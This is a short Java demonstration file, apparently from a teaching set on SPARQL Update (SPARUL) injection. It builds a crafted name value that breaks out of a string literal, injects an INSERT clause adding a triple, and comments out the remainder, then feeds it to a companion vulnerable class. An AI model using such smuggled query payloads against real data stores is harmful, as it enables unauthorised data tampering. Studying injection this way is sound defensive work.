package injection.sample5_SPARUL_Injection;

// SPARUL Injection
public class Sample5hack {
	public static void main(String [] args) throws Exception{
		Sample5code sample = new Sample5code();
		String name = "Pablo Ordunya'^^xsd:string" +
			"} \n " +
			"INSERT {" +
			"	injection:Pablo injection:isFriendOf injection:EvilMonkey" +
			"} #"; // }:-D		
		String result = sample.run(name);
		System.out.println(result);
	}
}